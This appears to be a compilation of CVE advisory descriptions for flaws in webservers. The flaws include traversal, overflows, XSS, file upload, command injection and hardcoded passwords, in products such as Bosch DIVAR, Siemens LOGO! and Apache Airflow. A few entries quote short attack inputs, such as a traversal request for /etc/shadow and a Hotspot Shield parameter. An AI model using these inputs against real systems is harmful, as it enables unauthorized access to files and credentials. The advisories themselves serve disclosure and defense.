A Path Traversal vulnerability located in the webserver affects several Bosch hardware and software products. The vulnerability potentially allows a remote authorized user to access arbitrary files on the system via the network interface. Affected hardware products: Bosch DIVAR IP 2000 (vulnerable versions: 3.10; 3.20; 3.21; 3.50; 3.51; 3.55; 3.60; 3.61; 3.62; fixed versions: 3.62.0019 and newer), Bosch DIVAR IP 5000 (vulnerable versions: 3.10; 3.20; 3.21; 3.50; 3.51; 3.55; 3.60; 3.61; 3.62; fixed versions: 3.80.0033 and newer). Affected software products: Video Recording Manager (VRM) (vulnerable versions: 3.10; 3.20; 3.21; 3.50; 3.51; 3.55; 3.60; 3.61; 3.62; 3.70; 3.71 before 3.71.0032 ; fixed versions: 3.71.0032; 3.81.0032 and newer), Bosch Video Management System (BVMS) (vulnerable versions: 3.50.00XX; 3.55.00XX; 3.60.00XX; 3.70.0056; fixed versions: 7.5; 3.71.0032).
An Open Redirect vulnerability located in the webserver affects several Bosch hardware and software products. The vulnerability potentially allows a remote attacker to redirect users to an arbitrary URL. Affected hardware products: Bosch DIVAR IP 2000 (vulnerable versions: 3.10; 3.20; 3.21; 3.50; 3.51; 3.55; 3.60; 3.61; 3.62; fixed versions: 3.62.0019 and newer), Bosch DIVAR IP 5000 (vulnerable versions: 3.10; 3.20; 3.21; 3.50; 3.51; 3.55; 3.60; 3.61; 3.62; fixed versions: 3.80.0033 and newer). Affected software products: Video Recording Manager (VRM) (vulnerable versions: 3.20; 3.21; 3.50; 3.51; 3.55; 3.60; 3.61; 3.62; fixed versions: 3.70.0056 and newer; 3.81.0032 and newer), Bosch Video Management System (BVMS) (vulnerable versions: 3.50.00XX; 3.55.00XX; 3.60.00XX; fixed versions: 7.5; 3.70.0056).
In Magento prior to 1.9.4.3, Magento prior to 1.14.4.3, Magento 2.2 prior to 2.2.10, and Magento 2.3 prior to 2.3.3 or 2.3.2-p1, an authenticated user with administrative privileges for the import feature can execute arbitrary code through a race condition that allows webserver configuration file modification.
An issue was discovered on Linksys WRT1900ACS 1.0.3.187766 devices. An ability exists for an unauthenticated user to browse a confidential ui/1.0.99.187766/dynamic/js/setup.js.localized file on the router's webserver, allowing for an attacker to identify possible passwords that the system uses to set the default guest network password. An attacker can use this list of 30 words along with a random 2 digit number to brute force their access onto a router's guest network.
A vulnerability has been identified in SIEMENS LOGO!8 (6ED1052-xyyxx-0BA8 FS:01 to FS:06 / Firmware version V1.80.xx and V1.81.xx), SIEMENS LOGO!8 (6ED1052-xyy08-0BA0 FS:01 / Firmware version &lt; V1.82.02). The integrated webserver does not invalidate the Session ID upon user logout. An attacker that successfully extracted a valid Session ID is able to use it even after the user logs out. The security vulnerability could be exploited by an attacker in a privileged network position who is able to read the communication between the affected device and the user or by an attacker who is able to obtain valid Session IDs through other means. The user must invoke a session to the affected device. At the time of advisory publication no public exploitation of this security vulnerability was known.
The webserver of the affected devices contains a vulnerability that may lead to a denial of service condition. An attacker may cause a denial of service situation which leads to a restart of the webserver of the affected device. The security vulnerability could be exploited by an attacker with network access to the affected systems. Successful exploitation requires no system privileges and no user interaction. An attacker could use the vulnerability to compromise availability of the device.
Dell EMC iDRAC6 versions prior to 2.92, iDRAC7/iDRAC8 versions prior to 2.61.60.60, and iDRAC9 versions prior to 3.20.21.20, 3.21.24.22, 3.21.26.22 and 3.23.23.23 contain a stack-based buffer overflow vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to crash the webserver or execute arbitrary code on the system with privileges of the webserver by sending specially crafted input data to the affected system.
An issue was discovered in SALTO ProAccess SPACE 5.4.3.0. The product's webserver runs as a Windows service with local SYSTEM permissions by default. This is against the principle of least privilege. An attacker who is able to exploit CVE-2019-19458 or CVE-2019-19459 is basically able to write to every single path on the file system, because the webserver is running with the highest privileges available.
An unrestricted file upload vulnerability was discovered in catalog/productinfo/imageupload in Fecshop FecMall 2.3.4. An attacker can bypass a front-end restriction and upload PHP code to the webserver, by providing image data and the image/jpeg content type, with a .php extension. This occurs because the code relies on the getimagesize function.
The slub_events (aka SLUB: Event Registration) extension through 3.0.2 for TYPO3 allows uploading of arbitrary files to the webserver. For versions 1.2.2 and below, this results in Remote Code Execution. In versions later than 1.2.2, this can result in Denial of Service, since the web space can be filled up with arbitrary files.
headerv2.go in mastercactapus proxyprotocol before 0.0.2, as used in the mastercactapus caddy-proxyprotocol plugin through 0.0.2 for Caddy, allows remote attackers to cause a denial of service (webserver panic and daemon crash) via a crafted HAProxy PROXY v2 request with truncated source/destination address data.
A vulnerability has been identified in EN100 Ethernet module DNP3 variant (All versions), EN100 Ethernet module IEC 61850 variant (All versions &lt; V4.37), EN100 Ethernet module IEC104 variant (All versions), EN100 Ethernet module Modbus TCP variant (All versions), EN100 Ethernet module PROFINET IO variant (All versions). An unauthorized user could exploit a buffer overflow vulnerability in the webserver. Specially crafted packets sent could cause a Denial-of-Service condition and if certain conditions are met, the affected devices must be restarted manually to fully recover. At the time of advisory publication no public exploitation of this security vulnerability was known.
The remote admin webserver on FANUC Robotics Virtual Robot Controller 8.23 has a Buffer Overflow via a forged HTTP request.
The remote admin webserver on FANUC Robotics Virtual Robot Controller 8.23 allows Directory Traversal via a forged HTTP request.
A malicious admin user could edit the state of objects in the Airflow metadata database to execute arbitrary javascript on certain page views. This also presented a Local File Disclosure vulnerability to any file readable by the webserver process.
Kalki Kalkitech SYNC3000 Substation DCU GPC v2.22.6, 2.23.0, 2.24.0, 3.0.0, 3.1.0, 3.1.16, 3.2.3, 3.2.6, 3.5.0, 3.6.0, and 3.6.1, when WebHMI is not installed, allows an attacker to inject client-side commands or scripts to be executed on the device with privileged access, aka CYB/2019/19561. The attack requires network connectivity to the device and exploits the webserver interface, typically through a browser.
A vulnerability has been identified in SIMATIC MV400 family (All Versions &lt; V7.0.6). An authenticated attacker could escalate privileges by sending specially crafted requests to the integrated webserver. The security vulnerability can be exploited by an attacker with network access to the device. Valid user credentials, but no user interaction are required. Successful exploitation compromises integrity and availability of the device. At the time of advisory publication no public exploitation of this security vulnerability was known.
Cherokee Webserver Latest Cherokee Web server Upto Version 1.2.103 (Current stable) is affected by: Buffer Overflow - CWE-120. The impact is: Crash. The component is: Main cherokee command. The attack vector is: Overwrite argv[0] to an insane length with execl. The fixed version is: There's no fix yet.
LINAGORA hublin latest (commit 72ead897082403126bf8df9264e70f0a9de247ff) is affected by: Directory Traversal. The impact is: The vulnerability allows an attacker to access any file (with a fixed extension) on the server. The component is: A web-view renderer; details here: https://lgtm.com/projects/g/linagora/hublin/snapshot/af9f1ce253b4ee923ff8da8f9d908d02a8e95b7f/files/backend/webserver/views.js?sort=name&amp;dir=ASC&amp;mode=heatmap&amp;showExcluded=false#xb24eb0101d2aec21:1. The attack vector is: Attacker sends a specially crafted HTTP request.
A number of HTTP endpoints in the Airflow webserver (both RBAC and classic) did not have adequate protection and were vulnerable to cross-site request forgery attacks.
A malicious admin user could edit the state of objects in the Airflow metadata database to execute arbitrary javascript on certain page views.
Path Traversal in Gateway in Mirasys DVMS Workstation 5.12.6 and earlier allows an attacker to traverse the file system to access files or directories via the Web Client webserver.
\ProgramData\WebLog Expert\WebServer\WebServer.cfg in WebLog Expert Web Server Enterprise 9.4 has weak permissions (BUILTIN\Users:(ID)C), which allows local users to set a cleartext password and login as admin.
In TotalAlert Web Application in BeaconMedaes Scroll Medical Air Systems prior to v4107600010.23, by accessing a specific uniform resource locator (URL) on the webserver, a malicious user may be able to access information in the application without authenticating.
Hotspot Shield runs a webserver with a static IP address 127.0.0.1 and port 895. The web server uses JSONP and hosts sensitive information including configuration. User controlled input is not sufficiently filtered: an unauthenticated attacker can send a POST request to /status.js with the parameter func=$_APPLOG.Rfunc and extract sensitive information about the machine, including whether the user is connected to a VPN, to which VPN he/she is connected, and what is their real IP address.
react-dev-utils on Windows allows developers to run a local webserver for accepting various commands, including a command to launch an editor. The input to that command was not properly sanitized, allowing an attacker who can make a network request to the server (either via CSRF or by direct request) to execute arbitrary commands on the targeted system. This issue affects multiple branches: 1.x.x prior to 1.0.4, 2.x.x prior to 2.0.2, 3.x.x prior to 3.1.2, 4.x.x prior to 4.2.2, and 5.x.x prior to 5.0.2.
The Auto-Maskin DCU 210E, RP-210E, and Marine Pro Observer Android App use an embedded webserver that uses unencrypted plaintext for the transmission of the administrator PIN Impact: An attacker once authenticated can change configurations, upload new configuration files, and upload executable code via file upload for firmware updates. Requires access to the network. Affected releases are Auto-Maskin DCU-210E, RP-210E, and the Marine Pro Observer Android App. Versions prior to 3.7 on ARMv7.
A vulnerability has been identified in TeleControl Server Basic &lt; V3.1. An attacker with access to the TeleControl Server Basic's webserver (port 80/tcp or 443/tcp) could cause a Denial-of-Service condition on the web server. The remaining functionality of the TeleControl Server Basic is not affected by the Denial-of-Service condition.
An exploitable remote code execution vulnerability exists in the upload.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can upload a file, resulting in executable code being uploaded, and routable, to the webserver. An attacker can make an authenticated HTTP request to trigger this vulnerability.
In Apache Airflow before 1.10.2, a malicious admin user could edit the state of objects in the Airflow metadata database to execute arbitrary javascript on certain page views.
Reflected cross-site scripting (non-persistent) in SCADA WebServer (Versions prior to 2.03.0001) could allow an attacker to send a crafted URL that contains JavaScript, which can be reflected off the web application to the victim's browser.
An issue was discovered on Neato Botvac Connected 2.2.0 devices. They execute unauthenticated manual drive commands (sent to /bin/webserver on port 8081) if they already have an active session. Commands like forward, back, arc-left, arc-right, pivot-left, and pivot-right are executed even though the web socket replies with { "message" : "invalid authorization header" }. Without an active session, commands are still interpreted, but (except for eco-on and eco-off) have no effect, since without active driving, a driving direction does not change anything.
A replay issue was discovered on Neato Botvac Connected 2.2.0 devices. Manual control mode requires authentication, but once recorded, the authentication (always transmitted in cleartext) can be replayed to /bin/webserver on port 8081. There are no nonces, and timestamps are not checked at all.
A vulnerability has been identified in SIMATIC HMI Comfort Panels 4" - 22" (All versions &lt; V15 Update 4), SIMATIC HMI Comfort Outdoor Panels 7" &amp; 15" (All versions &lt; V15 Update 4), SIMATIC HMI KTP Mobile Panels KTP400F, KTP700, KTP700F, KTP900 and KTP900F (All versions &lt; V15 Update 4), SIMATIC WinCC Runtime Advanced (All versions &lt; V15 Update 4), SIMATIC WinCC Runtime Professional (All versions &lt; V15 Update 4), SIMATIC WinCC (TIA Portal) (All versions &lt; V15 Update 4), SIMATIC HMI Classic Devices (TP/MP/OP/MP Mobile Panel) (All versions). The webserver of affected HMI devices may allow URL redirections to untrusted websites. An attacker must trick a valid user who is authenticated to the device into clicking on a malicious link to exploit the vulnerability. At the time of advisory publication no public exploitation of this security vulnerability was known.
** DISPUTED ** Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&amp;file= URI. NOTE: the vendor indicates that the product is not intended for a "publicly accessible environment."
Redatam7 (formerly Redatam WebServer) allows remote attackers to discover the installation path via an invalid LFN parameter to the /redbin/rpwebutilities.exe/text URI.
Redatam7 (formerly Redatam WebServer) allows remote attackers to read arbitrary files via /redbin/rpwebutilities.exe/text?LFN=../ directory traversal.
Insufficient session validation in the webserver component of the Intel Rapid Web Server 3 may allow an unauthenticated user to potentially disclose information via network access.
An issue was discovered in Joomla! Core before 3.8.8. Depending on the server configuration, PHAR files might be handled as executable PHP scripts by the webserver.
An issue was discovered in MyBiz MyProcureNet 5.0.0. A malicious file can be uploaded to the webserver by an attacker. It is possible for an attacker to upload a script to issue operating system commands. This vulnerability occurs because an attacker is able to adjust the "HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary extensions to the whitelist during the upload. For instance, if the extension .asp is added to the "HiddenFieldControlCustomWhiteListedExtensions" parameter, the server accepts "secctest.asp" as a legitimate file. Hence malicious files can be uploaded in order to execute arbitrary commands to take over the server.
HotelDruid HotelDruid 2.3.0 version 2.3.0 and earlier contains a SQL Injection vulnerability in "id_utente_mod" parameter in gestione_utenti.php file that can result in An attacker can dump all the database records of backend webserver. This attack appear to be exploitable via the attack can be done by anyone via specially crafted sql query passed to the "id_utente_mod=1" parameter.
An issue was discovered on D-Link DCS-1130 devices. The device provides a crossdomain.xml file with no restrictions on who can access the webserver. This allows an hosted flash file on any domain to make calls to the device's webserver and pull any information that is stored on the device. In this case, user's credentials are stored in clear text on the device and can be pulled easily. It also seems that the device does not implement any cross-site scripting forgery protection mechanism which allows an attacker to trick a user who is logged in to the web management interface into executing a cross-site flashing attack on the user's browser and execute any action on the device provided by the web management interface which steals the credentials from tools_admin.cgi file's response and displays it inside a Textfield.
An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of setting a name for the wireless network. These values are stored by the device in NVRAM (Non-volatile RAM). It seems that the POST parameters passed in this request to set up names on the device do not have a string length check on them. This allows an attacker to send a large payload in the "mssid_1" POST parameter. The device also allows a user to view the name of the Wifi Network set by the user. While processing this request, the device calls a function at address 0x00412CE4 (routerSummary) in the binary "webServer" located in Almond folder, which retrieves the value set earlier by "mssid_1" parameter as SSID2 and this value then results in overflowing the stack set up for this function and allows an attacker to control $ra register value on the stack which allows an attacker to control the device by executing a payload of an attacker's choice. If the firmware version AL-R096 is dissected using binwalk tool, we obtain a cpio-root archive which contains the filesystem set up on the device that contains all the binaries. The binary "goahead" is the one that has the vulnerable function that receives the values sent by the POST request. If we open this binary in IDA-pro we will notice that this follows a MIPS little endian format. The function sub_00420F38 in IDA pro is identified to be receiving the values sent in the POST parameter "mssid_1" at address 0x0042BA00 and then sets in the NVRAM at address 0x0042C314. The value is later retrieved in the function at address 0x00412EAC and this results in overflowing the buffer as the function copies the value directly on the stack.
An issue was discovered in Contiki Operating System 3.0. A Persistent XSS vulnerability is present in the MQTT/IBM Cloud Config page (aka mqtt.html) of cc26xx-web-demo. The cc26xx-web-demo features a webserver that runs on a constrained device. That particular page allows a user to remotely configure that device's operation by sending HTTP POST requests. The vulnerability consists of improper input sanitisation of the text fields on the MQTT/IBM Cloud config page, allowing for JavaScript code injection.
An issue was discovered on Miele Professional PST10 devices. The corresponding embedded webserver "PST10 WebServer" typically listens to port 80 and is prone to a directory traversal attack; therefore, an unauthenticated attacker may be able to exploit this issue to access sensitive information to aide in subsequent attacks. A Proof of Concept is GET /../../../../../../../../../../../../etc/shadow HTTP/1.1. This affects PG8527 devices 2.02 before 2.12, PG8527 devices 2.51 before 2.61, PG8527 devices 2.52 before 2.62, PG8527 devices 2.54 before 2.64, PG8528 devices 2.02 before 2.12, PG8528 devices 2.51 before 2.61, PG8528 devices 2.52 before 2.62, PG8528 devices 2.54 before 2.64, PG8535 devices 1.00 before 1.10, PG8535 devices 1.04 before 1.14, PG8536 devices 1.10 before 1.20, and PG8536 devices 1.14 before 1.24.
Missing HTTP Strict Transport Security state information vulnerability in the server in McAfee Network Data Loss Prevention (NDLP) 9.3.x allows man-in-the-middle attackers to expose confidential data via read files on the webserver.
cgi-bin/write.cgi in Anti-Web through 3.8.7, as used on NetBiter / HMS, Ouman EH-net, Alliance System WS100 --&gt; AWU 500, Sauter ERW100F001, Carlo Gavazzi SIU-DLG, AEDILIS SMART-1, SYXTHSENSE WebBiter, ABB SREA, and ASCON DY WebServer devices, allows remote authenticated users to execute arbitrary OS commands via crafted multipart/form-data content, a different vulnerability than CVE-2017-9097.
Huawei MBB (Mobile Broadband) products E5771h-937 with the versions before E5771h-937TCPU-V200R001B328D62SP00C1133 and the versions before E5771h-937TCPU-V200R001B329D05SP00C1308 have a Denial of Service (DoS) vulnerability. When an attacker accessing device sends special http request to device, the webserver process will try to apply too much memory which can cause the device to become unable to respond. An attacker can launch a DoS attack by exploiting this vulnerability.
The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal.
Code injection exists in Kernel/System/Spelling.pm in Open Ticket Request System (OTRS) 5 before 5.0.24, 4 before 4.0.26, and 3.3 before 3.3.20. In the agent interface, an authenticated remote attacker can execute shell commands as the webserver user via URL manipulation.
wanggoujing123 is a simple webserver. wanggoujing123 is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the url.
tinyserver2 is a webserver for static files. tinyserver2 is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the URL.
Nes is a websocket extension library for hapi. Hapi is a webserver framework. Versions below and including 6.4.0 have a denial of service vulnerability via an invalid Cookie header. This is only present when websocket authentication is set to `cookie`. Submitting an invalid cookie on the websocket upgrade request will cause the node process to error out.
In Apache Airflow 1.8.2 and earlier, an authenticated user can execute code remotely on the Airflow webserver by creating a special object.
An Improper Authentication issue was discovered in iniNet Solutions iniNet Webserver, all versions prior to V2.02.0100. The webserver does not properly authenticate users, which may allow a malicious attacker to access sensitive information such as HMI pages or modify PLC variables.
Starry Station (aka Starry Router) sets the Access-Control-Allow-Origin header to "*". This allows any hosted file on any domain to make calls to the device's webserver and brute force the credentials and pull any information that is stored on the device. In this case, a user's Wi-Fi credentials are stored in clear text on the device and can be pulled easily.
A vulnerability has been identified in LOGO! 8 BM (incl. SIPLUS variants) (All versions &lt; V1.81.2). An attacker with network access to the integrated web server on port 80/tcp could obtain the session ID of an active user session. A user must be logged in to the web interface. Siemens recommends to use the integrated webserver on port 80/tcp only in trusted networks.
EmbedThis GoAhead Webserver version 4.0.0 is vulnerable to a NULL pointer dereference in the CGI handler resulting in memory corruption or denial of service.
EmbedThis GoAhead Webserver versions 4.0.0 and earlier is vulnerable to an integer overflow in the HTTP listener resulting in denial of service.
InvoicePlane version 1.4.10 is vulnerable to a Arbitrary File Upload resulting in an authenticated user can upload a malicious file to the webserver. It is possible for an attacker to upload a script which is able to compromise the webserver.
Buffer overflow in send_redirect() in Boa Webserver 0.92r allows remote attackers to DoS via an HTTP GET request requesting a long URI with only '/' and '.' characters.
An issue was discovered in Eaton xComfort Ethernet Communication Interface (ECI) Versions 1.07 and prior. By accessing a specific uniform resource locator (URL) on the webserver, a malicious user may be able to access files without authenticating.
An issue was discovered in Moxa SoftCMS versions prior to Version 1.6. Moxa SoftCMS Webserver does not properly validate input. An attacker could provide unexpected values and cause the program to crash or excessive consumption of resources could result in a denial-of-service condition.
An issue was discovered in Moxa SoftCMS versions prior to Version 1.6. A specially crafted URL request sent to the SoftCMS ASP Webserver can cause a double free condition on the server allowing an attacker to modify memory locations and possibly cause a denial of service or the execution of arbitrary code.
Special element injection vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows authenticated remote attackers to read files on the webserver via a crafted user input.
The Apache HTTP Server 2.4.18 through 2.4.20, when mod_http2 and mod_ssl are enabled, does not properly recognize the "SSLVerifyClient require" directive for HTTP/2 request authorization, which allows remote attackers to bypass intended access restrictions by leveraging the ability to send multiple requests over a single connection and aborting a renegotiation.
Cross-site scripting (XSS) vulnerability in the web server in Rockwell Automation Allen-Bradley CompactLogix 1769-L* before 28.011+ allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
MVPower CCTV DVR models, including TV-7104HE 1.8.4 115215B9 and TV7108HE, contain a web shell that is accessible via a /shell URI. A remote unauthenticated attacker can execute arbitrary operating system commands as root. This vulnerability has also been referred to as the "JAWS webserver RCE" because of the easily identifying HTTP response server field. Other firmware versions, at least from 2014 through 2019, can be affected. This was exploited in the wild in 2017 through 2022.
IniNet embeddedWebServer (aka eWebServer) before 2.02 for Windows CE uses cleartext for password storage, which allows context-dependent attackers to obtain sensitive information via unspecified vectors.
Directory traversal vulnerability in IniNet embeddedWebServer (aka eWebServer) before 2.02 allows remote attackers to read arbitrary files via a crafted pathname.
IniNet embeddedWebServer (aka eWebServer) before 2.02 mishandles URL encoding, which allows remote attackers to write to or delete files via a crafted string.
Multiple stack-based buffer overflows in IniNet embeddedWebServer (aka eWebServer) before 2.02 allow remote attackers to execute arbitrary code via a long field in an HTTP request.
Cross-site scripting (XSS) vulnerability in Easy File Sharing Web Server 6.8 allows remote attackers to inject arbitrary web script or HTML via the username field during registration, which is not properly handled by forum.ghp.
The fetch_url function in usr.bin/ftp/fetch.c in tnftp, as used in NetBSD 5.1 through 5.1.4, 5.2 through 5.2.2, 6.0 through 6.0.6, and 6.1 through 6.1.5 allows remote attackers to execute arbitrary commands via a | (pipe) character at the end of an HTTP redirect.
Buffer overflow in the Webserver component on the Huawei E5332 router before 21.344.27.00.1080 allows remote authenticated users to cause a denial of service (reboot) via a long parameter in an API service request message.
Buffer overflow in the Webserver component on the Huawei E5332 router before 21.344.27.00.1080 allows remote authenticated users to cause a denial of service (reboot) via a long URI.
Buffer overflow in Senkas Kolibri 2.0 allows remote attackers to execute arbitrary code via a long URI in a POST request.
IBM WebSphere Portal 6.1.0 through 6.1.0.6 CF27, 6.1.5 through 6.1.5.3 CF27, 7.0 through 7.0.0.2 CF28, 8.0 through 8.0.0.1 CF14, and 8.5.0 before CF03 provides different web-server error codes depending on whether a requested file exists, which allows remote attackers to determine the validity of filenames via a series of requests.
Stack-based buffer overflow in Kolibri 2.0 allows remote attackers to execute arbitrary code via a long URI in a GET request.
Unspecified vulnerability in the Oracle Access Manager component in Oracle Fusion Middleware 11.1.1.5 allows remote authenticated users to affect availability via unknown vectors related to Webserver Plugin.
MediaWiki 1.18.0 allows remote attackers to obtain the installation path via vectors related to thumbnail creation.
The create_response function in server/server.c in Psensor before 1.1.4 allows Directory Traversal because it lacks a check for whether a file is under the webserver directory.
A vulnerability in Mambo CMS v4.6.5 where the scripts thumbs.php, editorFrame.php, editor.php, images.php, manager.php discloses the root path of the webserver.
Unspecified vulnerability in the Oracle COREid Access component in Oracle Fusion Middleware 10.1.4.3.0 allows remote attackers to affect integrity via unknown vectors related to WebGate - WebServer plugin.
The web server in Cisco Unified MeetingPlace Application Server 7.x before 7.1MR1 Patch 2, 8.0 before 8.0MR1 Patch 1, and 8.5 before 8.5MR3 Patch 1 does not invalidate a session upon a logout action, which makes it easier for remote attackers to hijack sessions by leveraging knowledge of a session cookie, aka Bug ID CSCuc64885.
The web server in Novell ZENworks Configuration Management (ZCM) 10.3 and 11.2 before 11.2.4 does not properly perform authentication for zenworks/jsp/index.jsp, which allows remote attackers to conduct directory traversal attacks, and consequently upload and execute arbitrary programs, via a request to TCP port 443.
cgi-bin/pingping.cgi on QNAP VioStor NVR devices with firmware 4.0.3, and in the Surveillance Station Pro component in QNAP NAS, allows remote authenticated users to execute arbitrary commands by leveraging guest access and placing shell metacharacters in the query string.
QNAP VioStor NVR devices with firmware 4.0.3, and the Surveillance Station Pro component in QNAP NAS, have a hardcoded guest account, which allows remote attackers to obtain web-server login access via unspecified vectors.
NULL Pointer Dereference in PowerTCP WebServer for ActiveX 1.9.2 and earlier allows remote attackers to cause a denial of service (application crash) via a crafted HTTP request.
Directory traversal vulnerability in the WebServer (Thttpd.bat) in IpTools (aka Tiny TCP/IP server) 0.1.4 allows remote attackers to read arbitrary files via a .. (dot dot) in a HTTP request.
Monkey HTTP Daemon 0.9.3 might allow local users to overwrite arbitrary files via a symlink attack on a PID file, as demonstrated by a pathname different from the default /var/run/monkey.pid pathname.
Directory traversal vulnerability in HServer 0.1.1 allows remote attackers to read arbitrary files via a (1) ..%5c (dot dot encoded backslash) or (2) %2e%2e%5c (encoded dot dot backslash) in the PATH_INFO.
Monkey HTTP Daemon 0.9.3 uses a real UID of root and a real GID of root during execution of CGI scripts, which might allow local users to gain privileges by leveraging cgi-bin write access.
Monkey HTTP Daemon 0.9.3 retains the supplementary group IDs of the root account during operations with a non-root effective UID, which might allow local users to bypass intended file-read restrictions by leveraging a race condition in a file-permission check.
Stack consumption vulnerability in dartwebserver.dll 1.9 and earlier, as used in Dart PowerTCP WebServer for ActiveX and other products, allows remote attackers to cause a denial of service (daemon crash) via a long request.
The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
Multiple stack-based buffer overflows in MinaliC 2.0.0 allow remote attackers to execute arbitrary code via a (1) session_id cookie in a request to the get_cookie_value function in response.c, (2) directory name in a request to the add_default_file function in response.c, or (3) file name in a request to the retrieve_physical_file_name_or_brows function in response.c.
TYPO3 before 4.3.12, 4.4.x before 4.4.9, and 4.5.x before 4.5.4 allows remote attackers to delete arbitrary files on the webserver.
The Schneider Electric Quantum Ethernet Module, as used in the Quantum 140NOE771* and 140CPU65* modules, the Premium TSXETY* and TSXP57* modules, the M340 BMXNOE01* and BMXP3420* modules, and the STB DIO STBNIC2212 and STBNIP2* modules, uses hardcoded passwords for the (1) AUTCSE, (2) AUT_CSE, (3) fdrusers, (4) ftpuser, (5) loader, (6) nic2212, (7) nimrohs2212, (8) nip2212, (9) noe77111_v500, (10) ntpupdate, (11) pcfactory, (12) sysdiag, (13) target, (14) test, (15) USER, and (16) webserver accounts, which makes it easier for remote attackers to obtain access via the (a) TELNET, (b) Windriver Debug, or (c) FTP port.
Cross-site request forgery (CSRF) vulnerability in /ctrl in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to hijack the authentication of admins for requests that execute arbitrary programs.
Cross-site scripting (XSS) vulnerability in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to inject arbitrary web script or HTML via a request for a crafted URI.
Directory traversal vulnerability in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to access arbitrary files via unspecified vectors.
Directory traversal vulnerability in Oxide WebServer allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in an HTTP request.
Multiple cross-site scripting (XSS) vulnerabilities in GoAhead Webserver 2.18 allow remote attackers to inject arbitrary web script or HTML via (1) the group parameter to goform/AddGroup, related to addgroup.asp; (2) the url parameter to goform/AddAccessLimit, related to addlimit.asp; or the (3) user (aka User ID) or (4) group parameter to goform/AddUser, related to adduser.asp.
Stack-based buffer overflow in the (1) put_dir function in mongoose.c in Mongoose 3.0, (2) put_dir function in yasslEWS.c in yaSSL Embedded Web Server (yasslEWS) 0.2, and (3) _shttpd_put_dir function in io_dir.c in Simple HTTPD (shttpd) 1.42 allows remote attackers to execute arbitrary code via an HTTP PUT request, as exploited in the wild in 2011.
Directory traversal vulnerability in nhttpd (aka Nostromo webserver) before 1.9.4 allows remote attackers to execute arbitrary programs or read arbitrary files via a ..%2f (encoded dot dot slash) in a URI.
Stack-based buffer overflow in Kolibri 2.0 allows remote attackers to execute arbitrary code via a long URI in a HEAD request.
Buffer overflow in Webby Webserver 1.01 allows remote attackers to execute arbitrary code via a long HTTP GET request.
Joomla! Core is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to properly verify user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Joomla! Core versions 1.5.x ranging from 1.5.0 and up to and including 1.5.15 are vulnerable.
Directory traversal vulnerability in news/include/customize.php in Web Server Creator - Web Portal 0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the l parameter.
Multiple PHP remote file inclusion vulnerabilities in Web Server Creator - Web Portal 0.1 allow remote attackers to execute arbitrary PHP code via a URL in the (1) pg parameter to index.php and the (2) path parameter to news/form.php.
Cross-site scripting (XSS) vulnerability in the forum page in Web Server Creator - Web Portal 0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors to index.php.
Unspecified vulnerability in Sun Java System Web Server 7.0 Update 6 on Linux allows remote attackers to execute arbitrary code by sending a process memory address and crafted data to TCP port 80, as demonstrated by the vd_sjws2 module in VulnDisco.  NOTE: as of 20100106, this disclosure has no actionable information. However, because the VulnDisco author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Heap-based buffer overflow in Sun Java System Web Server 7.0 Update 6 on Linux allows remote attackers to discover process memory locations via crafted data to TCP port 80, as demonstrated by the vd_sjws2 module in VulnDisco.  NOTE: as of 20100106, this disclosure has no actionable information. However, because the VulnDisco author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
GoAhead WebServer allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
Cherokee Web Server 0.5.4 allows remote attackers to cause a denial of service (daemon crash) via an MS-DOS reserved word in a URI, as demonstrated by the AUX reserved word.
InterVations NaviCOPA Web Server 3.0.1.2 and earlier allows remote attackers to obtain the source code for a web page via a trailing encoded space character in a URI, as demonstrated by /index.html%20 and /index.php%20 URIs.
Directory traversal vulnerability in Cherokee Web Server 0.5.4 and earlier for Windows allows remote attackers to read arbitrary files via a /\.. (slash backslash dot dot) in the URL.
Buffer overflow in Sun Java System Web Server 7.0 Update 6 has unspecified impact and remote attack vectors, as demonstrated by the vd_sjws module in VulnDisco Pack Professional 8.12.  NOTE: as of 20091105, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
InterVations NaviCOPA Web Server 3.01 allows remote attackers to obtain the source code for a web page via an HTTP request with the addition of ::$DATA after the HTML file name.
Oracle iPlanet Web Server (formerly Sun Java System Web Server or Sun ONE Web Server) 6.1 before SP12, and 7.0 through Update 6, when running on Windows, allows remote attackers to read arbitrary JSP files via an alternate data stream syntax, as demonstrated by a .jsp::$DATA URI.
Buffer overflow in the http_parse_hex function in libz/misc.c in Zervit Webserver 0.02 allows remote attackers to cause a denial of service (daemon crash) via a long URI, related to http.c.
The web interface in Dreambox DM500C allows remote attackers to cause a denial of service (application hang) via a long URI.
Off-by-one error in the read_client function in webhttpd.c in Motion 3.2.10 and earlier might allow remote attackers to execute arbitrary code via a long request to a Motion HTTP Control interface, which triggers a stack-based buffer overflow with some combinations of processor architecture and compiler.
goform/QuickStart_c0 on the GoAhead Web Server on the FS4104-AW (aka rooter) VDSL device contains a password in the typepassword field, which allows remote attackers to obtain this password by reading the HTML source, a different vulnerability than CVE-2002-1603.
